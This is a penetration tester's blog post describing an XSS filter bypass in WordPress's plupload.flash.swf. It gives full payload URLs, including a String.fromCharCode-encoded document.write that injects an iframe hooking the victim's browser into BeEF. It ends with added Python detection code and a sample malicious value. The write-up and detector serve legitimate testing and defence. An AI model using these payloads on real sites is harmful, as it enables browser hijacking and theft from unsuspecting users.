Friday, April 12, 2013

XSS WAF Bypass Using CharCode() Encoding

Recently, while testing a client's web app, I found a potential XSS injection point. Unfortunately, most of the common XSS techniques did not work against this particular WordPress plugin file, 'plupload.flash.swf'.

Found the XSS injection point here:

http://webhost/wp-includes/js/plupload/plupload.flash.swf?id=

And got an initial alert box:

http://webhost/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28c%29{alert%281%29;}//
(This displays an alert box with the value "1"; for some reason you cannot input [a-zA-Z].)

I spent the earlier part of the morning trying to get it to do more, or to allow <script> tags, but I realized that at the point where the JavaScript is injected, you can't use HTML tags at all.

I bypassed that limitation using String.fromCharCode() encoding and got the standard alert box displaying [a-zA-Z] characters. But I still wanted to take it a step further and get the browser hooked into BeEF.

http:///wp-includes/js/plupload/plupload.flash.swf?id=\%22));}catch(e){alert(String.fromCharCode(120,66,49,78,52,82,89,120));}//

So, I thought of using document.write and encoding the HTML tags inside it, essentially writing a new page to the browser. This writes a NEW page to the browser that contains <script>alert("XSS")</script>.

It’s like XSS within XSS!

Now, with that POC, I encoded a new page containing an iframe that points at my BeEF instance... Look at this string, LOL.

http:///wp-includes/js/plupload/plupload.flash.swf?id=\"));}catch(e){document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,58,51,48,48,48,47,100,101,109,111,115,47,98,97,115,105,99,46,104,116,109,108,34,62,60,47,105,102,114,97,109,101,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62));}//

And Bingo! The browser is now hooked... We've defeated the WAF and created a dangerous XSS string!
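From the defensive side, the reason this string got past the WAF is that the markup it builds (`<iframe`, `<script`) never appears literally in the request: it is hidden behind percent-encoding and a list of code points. An inspection layer has to unwrap both before pattern-matching. The following Python is an added example, not code from the original post; it normalizes a query parameter the way a WAF rule or a log-review script would and flags markup in the decoded result. The sample parameter values (`BENIGN_ID`, `MALICIOUS_ID`) are constructed for the example.

```python
import re
from urllib.parse import unquote

# String.fromCharCode( 60, 104, ... ) with optional whitespace; the argument
# list is captured so the code points can be turned back into text.
CHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]+)\)")

# Markup and sinks that have no business appearing in a decoded query value.
SUSPICIOUS = ("<script", "<iframe", "document.write", "javascript:")

# Constructed sample values (not from the original post): one benign id and
# one breakout that builds <script>alert(1)</script> from code points.
BENIGN_ID = "upload-123"
MALICIOUS_ID = (
    r"\%22));}catch(e){document.write(String.fromCharCode("
    "60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,"
    "60,47,115,99,114,105,112,116,62));}//"
)

def decode_charcode_calls(value: str) -> str:
    """Replace each String.fromCharCode(...) call with the text it builds."""
    def expand(match: re.Match) -> str:
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        # JavaScript truncates each argument to 16 bits; mirror that here.
        return "".join(chr(c & 0xFFFF) for c in codes)
    return CHARCODE_RE.sub(expand, value)

def normalize(param: str) -> str:
    """Strip the layers an attacker stacks: percent-encoding, then charcode."""
    prev, cur = None, param
    # Repeat until stable so double-encoded values (%2522) are unwrapped too.
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return decode_charcode_calls(cur)

def inspect(param: str) -> list:
    """Return the suspicious markers present once the value is normalized."""
    decoded = normalize(param).lower()
    return [marker for marker in SUSPICIOUS if marker in decoded]

def scan_query(query: str) -> dict:
    """Map each parameter name in a raw query string to its findings."""
    findings = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        hits = inspect(value)
        if hits:
            findings[name] = hits
    return findings
```

Matching on the normalized value rather than the raw one is the whole point: `scan_query("id=" + MALICIOUS_ID)` reports `<script` and `document.write`, while the raw string contains neither `<` nor `script`.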

Props to Uncle Jim's charcode decoder/encoder:
http://jdstiles.com/java/cct.html
